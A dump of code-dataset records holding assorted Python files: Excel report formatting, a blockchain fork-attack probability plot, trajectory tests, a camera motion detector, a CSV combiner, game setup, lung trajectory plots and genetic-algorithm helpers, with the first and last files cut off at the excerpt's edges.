formatSum(worksheetName, workbook):\n sumFormat = workbook.add_format()\n sumFormat.set_border(1)\n sumFormat.set_bg_color('#a5a5a5')\n sumFormat.set_align('center')\n sumFormat.set_font_color('#FFFFFF')\n \n bold = workbook.add_format({'bold':True})\n blank = workbook.add_format()\n blank.set_border(1)\n blank.set_text_wrap()\n bold.set_border(1)\n bold.set_text_wrap()\n \n worksheetName.write('A1', 'Total Broken Links Identified', sumFormat)\n worksheetName.set_column(0, 0, 47.57)\n \n worksheetName.write('A2', 'Total Items Containing Broken Links', sumFormat)\n \n worksheetName.write('A3', 'Unique Broken Links', sumFormat)\n \n worksheetName.write('A6', 'Broken Link Type', sumFormat)\n worksheetName.write('B6', 'Cause', sumFormat)\n worksheetName.write('C6', 'Total', sumFormat)\n worksheetName.write('A7', 'Link Opportunity Identified', bold)\n worksheetName.write('B7', orgo, blank)\n \n worksheetName.write('A8', 'Content not in SilverCloud Inventory', bold )\n worksheetName.write('B8', sendUsContent, blank)\n worksheetName.write('A9', 'SilverCloud Cannot Validate URL(internal links)', bold )\n worksheetName.write('B9', confirmURL,blank)\n worksheetName.write('A10', 'Broken Link (external links)', bold)\n worksheetName.write('B10', notFunctional, blank)\n worksheetName.write('A11', 'Content Not in Knowledgebase', bold)\n worksheetName.write('B11', notLoaded,blank)\n \n \n worksheetName.write('B1','', blank)\n worksheetName.write('B2', '', blank)\n worksheetName.write('B3', '', blank)\n worksheetName.write('C7', '', blank)\n worksheetName.write('C8', '', blank)\n worksheetName.write('C9', '', blank)\n worksheetName.write('C10', '', blank)\n worksheetName.write('C11', '', blank)\n \n \n worksheetName.set_column(1,1, 34)\n worksheetName.set_column(2,2, 10.29)\n worksheetName.set_row(6, 90)\n worksheetName.set_row(7, 60)\n worksheetName.set_row(8,30)\n worksheetName.set_row(15, 36.75)\n worksheetName.merge_range('A17:C17', 'Please note: SilverCloud does not validate email addresses, and as such none are featured in these reports.', blank)\n \n worksheetName.merge_range('A14:C14', 'Instructions', sumFormat)\n worksheetName.merge_range('A15:C16', 'Please Use the Unique URL Validation tab to confirm the functionality of the URLS provided, or to provide additional instruction to SilverCloud. The Broken Links - Detail tab offers as inventory of all broken links and their location within content(for reference)', blank)\n worksheetName.write_formula('C7', '=COUNTIF(\\'Broken Links-Detail\\'!K:K,Summary!B7)',blank)\n worksheetName.write_formula('C8', '=COUNTIF(\\'Broken Links-Detail\\'!K:K,Summary!B8)',blank)\n worksheetName.write_formula('C9', '=COUNTIF(\\'Broken Links-Detail\\'!K:K,Summary!B9)',blank)\n worksheetName.write_formula('C10', '=COUNTIF(\\'Broken Links-Detail\\'!K:K,Summary!B10)',blank) \n worksheetName.write_formula('C11', '=COUNTIF(\\'Broken Links-Detail\\'!K:K,Summary!B11)',blank)\n worksheetName.write_formula('B1', '=COUNTIF(\\'Broken Links-Detail\\'!I:I,\\\"*\\\")',blank)\n worksheetName.write_formula('B3', '=COUNTIF(\\'Unique URL Validation\\'!A:A, \\\"*\\\")', blank)\ndef formatUnique(worksheetName, workbook, dataframe):\n worksheetName.set_column('A:A', 42.43)\n worksheetName.set_column('B:B', 67.57)\n worksheetName.set_column('C:C', 50.71)\n \n uniqueTitlesFormat = workbook.add_format({'bold': True})\n uniqueTitlesFormat.set_bg_color('#263441')\n uniqueTitlesFormat.set_font_color('#FFFFFF')\n \n worksheetName.write('A1', 'Broken Link', uniqueTitlesFormat)\n worksheetName.write('B1', 'Request', uniqueTitlesFormat)\n worksheetName.write('C1', 'Customer Response', uniqueTitlesFormat)\n \n blue = workbook.add_format()\n blue.set_bg_color('#d4dee8')\n blue.set_text_wrap()\n blue.set_border(1)\n \n white = workbook.add_format()\n white.set_bg_color('#ffffff')\n white.set_text_wrap()\n white.set_border(1)\n \n row = 0\n vlook = 1\n for item in dataframe:\n if (row+1) % 2 == 1:\n worksheetName.write(row+1, 0, str(item), blue)\n worksheetName.write_formula('B' + str(vlook+1),'=VLOOKUP(A%s,\\'Broken Links-Detail\\'!I1:K80, 3, FALSE)' %(str(vlook+1)),blue)\n worksheetName.write(row+1, 2, ' ' , blue)\n row+=1\n vlook+=1\n else:\n worksheetName.write(row+1, 0, str(item), white) \n worksheetName.write_formula('B' + str(vlook+1),'=VLOOKUP(A%s,\\'Broken Links-Detail\\'!I1:K80, 3, FALSE)' %(str(vlook+1)),white)\n worksheetName.write(row+1, 2, ' ', white)\n row+=1\n vlook+=1\n \n ","sub_path":"Broken Link Report/excelFormatter.py","file_name":"excelFormatter.py","file_ext":"py","file_size_in_byte":9880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"52222572","text":"#这个代码是用来计算分叉攻击成功的概率的\nimport matplotlib.pyplot as plt\nplt.rcParams['font.sans-serif']=['SimHei'] #用来正常显示中文标签\nimport numpy as np\ndef attack(q,z):\n\tp=1.0-q\n\tlambd=z*q/p\n\tsum=1.0\n\tfor i in range(0,z+1):\n\t\tpoisson=np.exp(-lambd)\n\t\tfor j in range(1,i+1):\n\t\t\tpoisson=poisson*lambd/j\n\t\tsum=sum-poisson*(1-np.power(q/p,z-i))\n\treturn sum\n\nif __name__ == '__main__':\n\tzz=range(1,40)\n\tl1=[]\n\tl2=[]\n\tl3=[]\n\tfor z in zz:\n\t\tl1.append(max(attack(0.1,z),0))\n\t\tl2.append(max(attack(0.3,z),0))\n\t\tl3.append(max(attack(0.4,z),0))\n\tplt.plot(zz,l1,label=\"q=0.1\")\n\tplt.plot(zz,l2,label=\"q=0.3\")\n\tplt.plot(zz,l3,label=\"q=0.4\")\n\tplt.xlabel(u\"攻击者与主链有z个区块的差距\")\n\tplt.ylabel(u\"攻击成功的概率\")\n\tplt.legend()\n\tplt.show()","sub_path":"block/attack.py","file_name":"attack.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"171670604","text":"import unittest\nfrom pytraj import io as mdio\nfrom pytraj import Trajectory\nfrom pytraj.utils.check_and_assert import assert_almost_equal as aa_eq\n\nclass Test(unittest.TestCase):\n def test_0(self):\n traj = mdio.iterload(\"./data/md1_prod.Tc5b.x\", \"./data/Tc5b.top\")\n FA = traj[:]\n\n print (traj['@CA'])\n frame0 = traj[0]\n print (hasattr(frame0, 'shape'))\n aa_eq(frame0[traj.top(\"@CA\")].flatten(), \n traj['@CA'].xyz.flatten())\n\n # slicing with list or array\n indices = [1, 2, 3]\n fa = traj[indices]\n fa2 = FA[indices]\n fa3 = traj[range(1, 4)]\n fa4 = FA[range(1, 4)]\n self.assertIsInstance(fa, Trajectory)\n # from TrajectoryIterator\n aa_eq(fa[0].coords, traj[1].coords)\n aa_eq(fa[1].coords, traj[2].coords)\n # from Trajectory\n aa_eq(fa2[1].coords, traj[2].coords)\n aa_eq(fa2[0].coords, traj[1].coords)\n\n # from \"range\"\n aa_eq(fa3[1].coords, traj[2].coords)\n aa_eq(fa3[0].coords, traj[1].coords)\n aa_eq(fa4[1].coords, traj[2].coords)\n aa_eq(fa4[0].coords, traj[1].coords)\n\n def test_1(self):\n # AtomMask\n traj = mdio.iterload(\"./data/md1_prod.Tc5b.x\", \"./data/Tc5b.top\")\n fa = traj.to_mutable_trajectory()\n xyz = traj.xyz[:]\n atm = traj.top.select(\"@CA\")\n indices = atm.indices\n\n aa_eq(fa[0, atm], fa[0][atm])\n aa_eq(traj[0, atm], fa[0][atm])\n aa_eq(traj[0, atm, 0], fa[0][atm, 0])\n aa_eq(traj[0, atm, 0], xyz[0][indices][0])\n aa_eq(traj[0, '@CA', 0], xyz[0][indices][0])\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"tests/test_fancy_indexing_2.py","file_name":"test_fancy_indexing_2.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"92063165","text":"#!/usr/bin/python3\nimport contextlib\nimport cv2\nimport numpy as np\nimport threading\nimport time\nfrom picamera import PiCamera\n\n\nclass MotionDetector:\n def __init__(self):\n self.requestBorrow = threading.Event()\n self.beginBorrow = threading.Event()\n self.endBorrow = threading.Event()\n self.thread = threading.Thread(target=self._threadMain, daemon=True)\n self.lastMotionImage = None\n self.lastMotionTime = 0\n\n def start(self):\n self.thread.start()\n\n @contextlib.contextmanager\n def borrowCamera(self):\n self.requestBorrow.set()\n self.beginBorrow.wait()\n self.beginBorrow.clear()\n try:\n with PiCamera() as camera:\n yield camera\n finally:\n self.endBorrow.set()\n\n def _threadMain(self):\n while True:\n self._run()\n self.requestBorrow.clear()\n self.beginBorrow.set()\n self.endBorrow.wait()\n self.endBorrow.clear()\n\n def _run(self):\n width, height, blur, weight, threshold, minArea, minFrames = 640, 480, 2, 0.2, 5, 6000, 3\n avgFrame, nFrames = None, 0\n with PiCamera() as camera:\n camera.resolution = (width, height)\n camera.video_denoise = False\n camera.image_effect = 'blur'\n camera.image_effect_params = (blur,)\n\n yuv = np.empty((int(width * height * 1.5),), dtype=np.uint8)\n for x in camera.capture_continuous(yuv, format='yuv', use_video_port=True):\n image = yuv[:width*height].reshape((height, width))\n if avgFrame is None:\n avgFrame = image.copy().astype('float')\n else:\n cv2.accumulateWeighted(image, avgFrame, weight)\n delta = cv2.absdiff(image, cv2.convertScaleAbs(avgFrame))\n thresh = cv2.threshold(\n delta, threshold, 255, cv2.THRESH_BINARY)[1]\n thresh = cv2.dilate(thresh, None, iterations=2)\n\n hasMotion = False\n for contour in cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[1]:\n if cv2.contourArea(contour) < minArea:\n continue\n hasMotion = True\n\n if hasMotion:\n nFrames += 1\n if nFrames == minFrames:\n self.lastMotionImage = image.copy()\n self.lastMotionTime = time.time()\n else:\n nFrames = 0\n\n if self.requestBorrow.is_set():\n return\n time.sleep(0.1)\n","sub_path":"motion.py","file_name":"motion.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"9073072","text":"import glob\nimport os\nimport codecs\nfrom general.general import clear_files\n\ncurrent_dir = os.path.dirname(os.path.abspath(__file__))\n# source_files_dir = \"/home/michael/Downloads/\"\nsource_files_dir = \"/home/michael/Downloads/\"\n\nsource_files_mask = source_files_dir + \"*.csv\"\n\n\n\n\n# 'utf-8', 'windows-1251'\nREAD_ENCODING = 'windows-1251'\nWRITE_ENCODING = 'windows-1251'\n\nresult_file_dir = os.path.join(current_dir, \"../CombinedFiles\")\n\nclear_files(result_file_dir)\n\nresult_file = os.path.join(result_file_dir, 'result.csv')\n\nfile_list = glob.glob(source_files_mask)\n\n\ndef combine(first_column_only = False):\n if first_column_only:\n counter = 1\n for a_file in file_list:\n with codecs.open(a_file, 'r', encoding=READ_ENCODING) as r_file:\n while True:\n try:\n line = r_file.readline()\n except UnicodeDecodeError:\n continue # Встретилась строка не в кодировке utf. Например, Букварикс может поместить такие строки в конце.\n if (not line):\n break\n try:\n start_pos = line.index('\"')\n end_pos = line.index('\"', start_pos + 1)\n except ValueError:\n continue # Кавычка не найдена.\n\n\n with codecs.open(result_file, 'a', encoding=WRITE_ENCODING) as w_file:\n phrase = line[start_pos+1:end_pos]\n w_file.write(\"{}\\n\".format(phrase))\n print(\"{}:{}\".format(counter, phrase))\n counter += 1\n\n else:\n\n for a_file in file_list:\n with codecs.open(a_file, 'r', encoding = READ_ENCODING) as file:\n try:\n lines = file.read()\n except UnicodeDecodeError:\n continue\n\n with codecs.open(result_file, 'a', encoding = WRITE_ENCODING) as file:\n try:\n file.write(lines)\n except UnicodeEncodeError:\n pass # Поставить точку останова и смотреть в каждом конкретном случае.\n\n\ncombine(first_column_only = True)","sub_path":"combine.py","file_name":"combine.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"175950123","text":"# coding: utf-8\nimport argparse\nimport logging\nfrom random import seed\n\nfrom synergine2.log import get_default_logger\nfrom synergine2.config import Config\nfrom synergine2_cocos2d.const import SELECTION_COLOR_RGB\nfrom synergine2_cocos2d.util import get_map_file_path_from_dir\nfrom synergine2.core import Core\nfrom synergine2.cycle import CycleManager\nfrom synergine2.terminals import TerminalManager\n\nfrom opencombat.const import FLAG, SIDE\nfrom opencombat.const import FLAG_DE\nfrom opencombat.const import DE_COLOR\nfrom opencombat.const import URSS_COLOR\nfrom opencombat.const import FLAG_URSS\nfrom opencombat.simulation.subject import ManSubject\nfrom opencombat.simulation.subject import TankSubject\nfrom opencombat.simulation.base import TileStrategySimulation\nfrom opencombat.simulation.base import TileStrategySubjects\nfrom opencombat.terminal.base import CocosTerminal\n\n\ndef main(map_dir_path: str, seed_value: int=None):\n if seed_value is not None:\n seed(seed_value)\n\n config = Config()\n config.load_yaml('config.yaml')\n level = logging.getLevelName(config.resolve('global.logging_level', 'ERROR'))\n logger = get_default_logger(level=level)\n\n map_file_path = get_map_file_path_from_dir(map_dir_path)\n\n simulation = TileStrategySimulation(config, map_file_path=map_file_path)\n subjects = TileStrategySubjects(simulation=simulation)\n\n for position in ((10, 2), (11, 3), (11, 4), (12, 5),):\n man = ManSubject(\n config=config,\n simulation=simulation,\n position=position,\n properties={\n SELECTION_COLOR_RGB: DE_COLOR,\n FLAG: FLAG_DE,\n SIDE: 'AXIS',\n }\n )\n subjects.append(man)\n\n for position in ((30, 15), (31, 16), (32, 17), (33, 18),):\n man = ManSubject(\n config=config,\n simulation=simulation,\n position=position,\n properties={\n SELECTION_COLOR_RGB: URSS_COLOR,\n FLAG: FLAG_URSS,\n SIDE: 'ALLIES',\n }\n )\n subjects.append(man)\n\n for position in ((38, 24),):\n man = TankSubject(\n config=config,\n simulation=simulation,\n position=position,\n properties={\n SELECTION_COLOR_RGB: URSS_COLOR,\n FLAG: FLAG_URSS,\n SIDE: 'ALLIES',\n }\n )\n subjects.append(man)\n\n simulation.subjects = subjects\n\n core = Core(\n config=config,\n simulation=simulation,\n cycle_manager=CycleManager(\n config=config,\n simulation=simulation,\n ),\n terminal_manager=TerminalManager(\n config=config,\n terminals=[CocosTerminal(\n config,\n asynchronous=False,\n map_dir_path=map_dir_path,\n )]\n ),\n cycles_per_seconds=1 / config.resolve('core.cycle_duration'),\n )\n core.run()\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Run TileStrategy')\n parser.add_argument('map_dir_path', help='map directory path')\n parser.add_argument('--seed', dest='seed', default=None)\n\n args = parser.parse_args()\n\n main(args.map_dir_path, seed_value=args.seed)\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"609198444","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.contrib import admin\n\n# Register your models here.\nfrom api.models.mass_models import Song, Author, MassMoment, Mass\n\n\nclass MassMomentInline(admin.StackedInline):\n model = MassMoment\n extra = 1\n\n\nclass MassAdmin(admin.ModelAdmin):\n fields = ['description', 'day']\n inlines = [MassMomentInline]\n\n\nadmin.site.register(Song)\nadmin.site.register(Author)\nadmin.site.register(Mass, MassAdmin)\n\nadmin.site.site_header = \"Glorify\"\nadmin.site.site_title = \"Glorify - Sua liturgia acessível\"\n","sub_path":"api/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"202411106","text":"import binascii\nfrom itertools import cycle\n\ndef xor(xs, ys):\n return \"\".join(chr(ord(x) ^ ord(y)) for x, y in zip(xs, cycle(ys)))\n\nif __name__ == \"__main__\":\n a = raw_input(\"1 key\\n\")\n b = raw_input(\"2 key\\n\")\n c = xor(a,b)\n h = binascii.b2a_hex(c)\n print(h)\n","sub_path":"set1/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"103281223","text":"import sys\nread = sys.stdin.buffer.read\nreadline = sys.stdin.buffer.readline\nreadlines = sys.stdin.buffer.readlines\nsys.setrecursionlimit(10 ** 7)\n\nfrom collections import defaultdict\nfrom itertools import accumulate\n\nn, m, *a = map(int, read().split())\ndict = defaultdict(int)\nans = 0\nfor v in [0] + list(map(lambda x: int(x) % m, list(accumulate(a)))):\n ans += dict[v]\n dict[v] += 1\nprint(ans)\n","sub_path":"submissions/abc105/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"507320710","text":"import json\nfrom pprint import pprint\nfrom pathlib import Path\n\n\ndef load_data(file_path='markets.json'):\n \"\"\" загружаем данные из файла\n :param file_path: путь к файлу источнику в ANSI\n :return: ассоциативный массив с данными\n \"\"\"\n if Path(file_path).is_file():\n with open(file_path) as data_file:\n data = json.load(data_file)\n return data\n else:\n exit('файл не найден')\n\n\nif __name__ == '__main__':\n path = input('Введите путь к файлу, например, bars.json ')\n data = load_data(path)\n pprint(data)\n","sub_path":"pprint_json.py","file_name":"pprint_json.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"158372050","text":"'''\nlung_plots.py \nhandles plotting trajectories on the lung\n\nJ.Sganga 9/2/2016\n'''\n\nimport sys\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nimport numpy as np\nfrom matplotlib.collections import LineCollection\nfrom matplotlib.colors import ListedColormap, BoundaryNorm\nfrom matplotlib import gridspec\nimport matplotlib.lines as mlines\n\nfrom mpl_toolkits.axes_grid1.inset_locator import inset_axes, zoomed_inset_axes\nfrom mpl_toolkits.axes_grid1.inset_locator import mark_inset\nimport seaborn.apionly as sns # doesn't change the rcparams\n\n\nfrom load_history import history_data\nfrom figure_settings import icra\nicra = icra()\n\nsys.path.append('..')\nfrom lung_fit.transform_lung import get_transformed_lung\nfrom functions.computer_specific_paths import computer_paths\ncomputer_paths = computer_paths()\n\nblue, green, red, purple, yellow, cyan = sns.color_palette(\"deep\")[:]\ndefault_colors = [blue, green, red, purple, yellow, cyan]\ngrey = sns.xkcd_palette([\"greyish\"])[0]\n\nblues_cmap = 'Blues'# 0x71a3a58\n\nsheath_list = [0, 1, 2, 3]\nleader_list = [4, 5, 6, 7]\n\n\n\n\nclass plot_lung(object):\n \"\"\"holds history data from a lung run and plots it on the lung stl\"\"\"\n def __init__(self, history_files, run_names):\n self.run_list = []\n for file in history_files:\n self.run_list.append(history_data(file = file))\n self.run_names = run_names\n self.get_lung()\n self.offset = np.array([44, -78, -110]) # mm, positions lung nicely relative to plotting axes\n self.lung -= self.offset \n self.x_sensed = [] # lists contain each run's array's\n self.x_desired = []\n for run in self.run_list:\n self.x_sensed.append(run.x_sensed[:,:3] - self.offset)\n self.x_desired.append(run.x_desired[:,:3] - self.offset)\n self.find_way_point_indeces()\n\n\n def get_lung(self): \n self.lung, self.guide_trace = get_transformed_lung()\n \n def check_lung_fit(self):\n ax_xy = self.plot_lung_cloud(1, 0)\n ax_xy.plot(self.guide_trace[:,1], self.guide_trace[:,0], 'k.', alpha = 0.05)\n\n ax_xz = self.plot_lung_cloud(2, 0, with_trace = True)\n ax_xz.plot(self.guide_trace[:,2], self.guide_trace[:,0], 'k.', alpha = 0.05)\n return ax_xy, ax_xz\n\n def find_way_point_indeces(self):\n self.indeces = []\n for i_run, run in enumerate(self.run_list):\n index_list = []\n for data_pt in range(len(run.time_pts) - 1):\n if self.is_transition_point(i_run, data_pt):\n index_list.append(data_pt)\n index_list.append(len(run.time_pts))\n self.indeces.append(index_list)\n self.indeces = np.asarray(self.indeces).T # columns = runs\n\n\n def is_transition_point(self, i_run, data_pt):\n dx_desired = self.x_desired[i_run][data_pt + 1, :] - self.x_desired[i_run][data_pt, :]\n if max(abs(dx_desired)) > 0.5:\n return True\n else:\n return False\n\n def plot_lung_cloud(self, \n x_index,\n y_index,\n ax = plt.subplot(111),\n color = blue,\n alpha = 0.002,\n slice_index = 2,\n slice_max = 1e3,\n slice_min = -1e3,\n do_slice = False,# pass in reduced lung if wanted\n skip_n = 1): \n if do_slice:\n lung = self.lung[(self.lung[:,slice_index] < slice_max) & (self.lung[:,slice_index] > slice_min)]\n else:\n lung = self.lung\n\n ax.plot(lung[::skip_n, x_index], lung[::skip_n, y_index], '.', color = color, alpha = alpha, markersize = 3) \n ax.set_aspect('equal')\n ax.invert_yaxis()\n ax.invert_xaxis()\n sns.despine(ax = ax, top=True, right=True, left=False, bottom=False)\n return ax\n\n def add_on_lung(self, \n ax,\n i_run,\n view = 'xy',\n color = red,\n alpha = 0.5,\n linewidth = 2):\n if view.lower() == 'xy':\n x_index, y_index = 1, 0\n elif view.lower() == 'yz':\n x_index, y_index = 1, 2\n else:\n x_index, y_index = 2, 0\n start_pt = self.indeces[i_run][1]\n end_pt = self.indeces[i_run][-1] #-1 is end of recording, includes after trajec..\n\n x = self.x_sensed[i_run][start_pt:end_pt, x_index]\n y = self.x_sensed[i_run][start_pt:end_pt, y_index]\n line, = ax.plot(x, y, '-', color = color, alpha = alpha, linewidth = linewidth)\n return line\n\n def add_desired_on_lung(self,\n ax,\n i_run,\n view = 'xy',\n color = green,\n alpha = 0.1,\n markersize = 5,\n marker = 's'):\n if view.lower() == 'xy':\n x_index, y_index = 1, 0\n elif view.lower() == 'yz':\n x_index, y_index = 1, 2\n else:\n x_index, y_index = 2, 0\n start_pt = self.indeces[i_run][2]\n end_pt = self.indeces[i_run][-2] #-1 is end of recording, includes after trajec..\n x = self.x_desired[i_run][start_pt:end_pt, x_index]\n y = self.x_desired[i_run][start_pt:end_pt, y_index]\n ax.plot(x, y, '.', marker = marker, color = color, alpha = alpha, markersize = markersize)\n\n\n def make_lung_figure(self, \n fig_width = icra.col_width,\n fig_height = icra.golden_height,\n subplot_left = 0.2, # the left side of the subplots of the figure\n subplot_right = 0.9, # the right side of the subplots of the figure\n subplot_bottom = 0.2, # the bottom of the subplots of the figure\n subplot_top = 0.9, # the top of the subplots of the figure\n subplot_wspace = -.3, # the amount of width reserved for blank space between subplots\n subplot_hspace = -.25, # the amount of height reserved for white space between subplots\n skip_n = 1, # skip n - 1 points when plotting lung dots\n lung_color = blue,\n lung_alpha = 0.0058,\n lung_markersize = 2,\n rasterize_lung = True, # allows pdfs to not save every single point \n rasterize_order = 0, # no idea what this does\n run_colors = [blue, red, grey],\n run_alphas = [0.7, 0.7, 0.7],\n linewidth = 2,\n wp_color = green,\n wp_alpha = 0.8,\n wp_markersize = 4,\n zoom_factor = 1.5,\n bbox_tuple = (0.52, 0.6),\n zoom_limits = (-73, -18, 120, 200),\n legend_bbox = (1.65,1)):\n\n # make figure with subplots\n self.lung_fig = plt.figure(figsize=(fig_width, fig_height)) # w, h in inches\n gs = gridspec.GridSpec(1, 5) \n split = 2#3\n ax_xy = plt.subplot(gs[:, split:])\n ax_xz = plt.subplot(gs[:, :split])\n plt.subplots_adjust(subplot_left, subplot_bottom, subplot_right, subplot_top, subplot_wspace, subplot_hspace)\n \n # XZ subplot\n lung_slice = self.lung[self.lung[:,1] < 0]\n self.plot_lung_on_subplot(ax_xz, \n x_index = 2, \n y_index = 0, \n lung = lung_slice, \n skip_n = skip_n, \n lung_color = lung_color, \n lung_alpha = lung_alpha, \n lung_markersize = lung_markersize, \n rasterize_lung = rasterize_lung, \n rasterize_order = rasterize_order,\n hide_axes = [True, True, False, False])# [top, right, left, bottom] \n axes_ticks = [-50, 0, 50]\n axes_ticks_names = ['-50','0','50']\n plt.setp(ax_xz, \n xticks = axes_ticks, \n xticklabels= axes_ticks_names)\n ax_xz.invert_xaxis()\n ax_xz.set_xlabel(icra.axis_labels[2], fontsize = icra.label_fontsize)\n ax_xz.set_ylabel(icra.axis_labels[0], fontsize = icra.label_fontsize)\n\n\n # XY subplot\n self.plot_lung_on_subplot(ax_xy, \n x_index = 1, \n y_index = 0, \n lung = self.lung, \n skip_n = skip_n, \n lung_color = lung_color, \n lung_alpha = lung_alpha, \n lung_markersize = lung_markersize, \n rasterize_lung = rasterize_lung, \n rasterize_order = rasterize_order,\n hide_axes = [True, True, True, False])# [top, right, left, bottom] \n ax_xy.invert_xaxis()\n ax_xy.set_xlabel(icra.axis_labels[1], fontsize = icra.label_fontsize)\n ax_xy.yaxis.set_ticks([])\n\n\n for i_run, run in enumerate(self.run_list):\n self.add_on_lung(ax_xy, i_run, view = 'xy', color = run_colors[i_run], alpha = run_alphas[i_run], linewidth = linewidth)\n self.add_on_lung(ax_xz, i_run, view = 'xz', color = run_colors[i_run], alpha = run_alphas[i_run], linewidth = linewidth)\n # only plottign the first run's desired points. make sure it reached all of them\n self.add_desired_on_lung(ax_xy, i_run = 0, view = 'xy', color = wp_color, alpha = wp_alpha, markersize = wp_markersize)\n self.add_desired_on_lung(ax_xz, i_run = 0, view = 'xz', color = wp_color, alpha = wp_alpha, markersize = wp_markersize)\n\n # zoomed axis\n ax_in = zoomed_inset_axes(ax_xy, \n zoom_factor, # zoom-factor\n loc = 3, # not really sure, picks some location on the fig\n bbox_to_anchor = bbox_tuple, #allows fine tuned position control but not sure what they correspond to...\n bbox_transform = ax_xy.figure.transFigure) # strange command needed for bbox...\n ax_in.invert_xaxis()\n self.plot_lung_on_subplot(ax_in, \n x_index = 1, \n y_index = 0, \n lung = self.lung, \n skip_n = skip_n, \n lung_color = lung_color, \n lung_alpha = lung_alpha, \n lung_markersize = lung_markersize, \n rasterize_lung = rasterize_lung, \n rasterize_order = rasterize_order,\n hide_axes = [False, False, False, False])# [top, right, left, bottom] \n for i_run, run in enumerate(self.run_list):\n self.add_on_lung(ax_in, i_run, view = 'xy', color = run_colors[i_run], alpha = run_alphas[i_run])\n self.add_desired_on_lung(ax_in, i_run = 0, view = 'xy', color = wp_color, alpha = wp_alpha)\n\n x1, x2, y1, y2 = zoom_limits # specify the limits\n ax_in.set_xlim(x1, x2) # apply the x-limits\n ax_in.set_ylim(y1, y2) # apply the y-limits\n ax_in.invert_yaxis()\n ax_in.invert_xaxis()\n ax_in.xaxis.set_ticks([])\n ax_in.yaxis.set_ticks([]) \n # lines from parent to inset\n mark_inset(ax_xy, ax_in, loc1=2, loc2=4, fc=\"none\", ec=\"0.5\")\n\n self.line_labels = ['Way Points'] + self.run_names # for legend\n self.line_handles = [mlines.Line2D([0,0],[0,0], marker = 's', color = wp_color, markersize = wp_markersize, alpha = wp_alpha, linestyle = '')]\n for i_run, run in enumerate(self.run_list):\n line = mlines.Line2D([0,0],[0,0], color = run_colors[i_run], linewidth = linewidth, alpha = run_alphas[i_run])\n self.line_handles.append(line)\n\n plt.legend(handles = self.line_handles, \n labels = self.line_labels,\n loc = 'upper left', \n bbox_to_anchor = legend_bbox,\n fontsize = icra.label_fontsize)\n\n return self.lung_fig\n\n\n\n def plot_lung_on_subplot(self, \n ax, \n x_index, \n y_index, \n lung,\n skip_n = 1, # skip n - 1 points when plotting lung dots\n lung_color = blue,\n lung_alpha = 0.0058,\n lung_markersize = 2,\n rasterize_lung = True, # allows pdfs to not save every single point \n rasterize_order = 0,# no idea what this does\n hide_axes = [True, True, False, False]): # [top, right, left, bottom] \n ax.plot(lung[::skip_n, x_index], \n lung[::skip_n, y_index], \n '.', \n color = lung_color, \n alpha = lung_alpha, \n markersize = lung_markersize)\n ax.set_rasterized(rasterize_lung)\n ax.set_rasterization_zorder(rasterize_order)\n ax.tick_params(labelsize=icra.label_fontsize)\n ax.set_xlim(min(lung[:,x_index]), max(lung[:,x_index]))\n ax.set_ylim(min(lung[:,y_index]), max(lung[:,y_index])) \n ax.set_aspect('equal')\n ax.invert_yaxis()\n top, right, left, bottom = hide_axes\n sns.despine(ax = ax, top = top, right = right, left = left, bottom = bottom)\n\n\n def savefig(self, \n dpi = 300, \n file_format = 'pdf', \n file_name = 'test'):\n self.lung_fig.savefig(icra.fig_folder + file_name + '.' + file_format, dpi = dpi)\n\n \n\n \n ","sub_path":"catheter_simulation/data_analysis/lung_plots.py","file_name":"lung_plots.py","file_ext":"py","file_size_in_byte":14375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"326734525","text":"import numpy\ndef cal_pop_fitness(equation_inputs,pop):\n #calculating the fitness value of each solution in the current population\n #the fitness function calculates the sop between each input and its corresponding weight\n fitness = numpy.sum(pop*equation_inputs,axis=1)\n return fitness\ndef select_mating_pool(pop,fitness,num_parents):\n # Selecting the best individuals in the current generation as parents for producing off the offspring of the the next generation\n parents = numpy.empty((num_parents,pop.shape[-1]))\n for parent_num in range(num_parents):\n max_fitness_idx = numpy.where(fitness == numpy.max(fitness))\n max_fitness_idx = max_fitness_idx[0][0]\n parents[parent_num,:] = pop[max_fitness_idx,:]\n fitness[max_fitness_idx] = -99999999999\n return parents\ndef crossover(parents,offspring_size):\n offspring = numpy.empty(offspring_size)\n crossover_point = numpy.uint8(offspring_size[1]/2)\n for k in range(offspring_size[0]):\n #index of the first parent to mate\n parent1_idx = k % parents.shape[0]\n #index of the second parent to mate\n parent2_idx = (k+1) % parents.shape[0]\n offspring[k,0:crossover_point] = parents[parent1_idx,0:crossover_point]\n offspring[k,crossover_point:] = parents[parent2_idx,crossover_point:]\n return offspring\n\ndef mutation(offspring_crossover):\n\n #Mutation changes a single gene in each offspring randomly.\n for idx in range(offspring_crossover.shape[0]):\n #The random value to be added to gene\n random_value = numpy.random.uniform(-1.,1.,1)\n offspring_crossover[idx,4] = 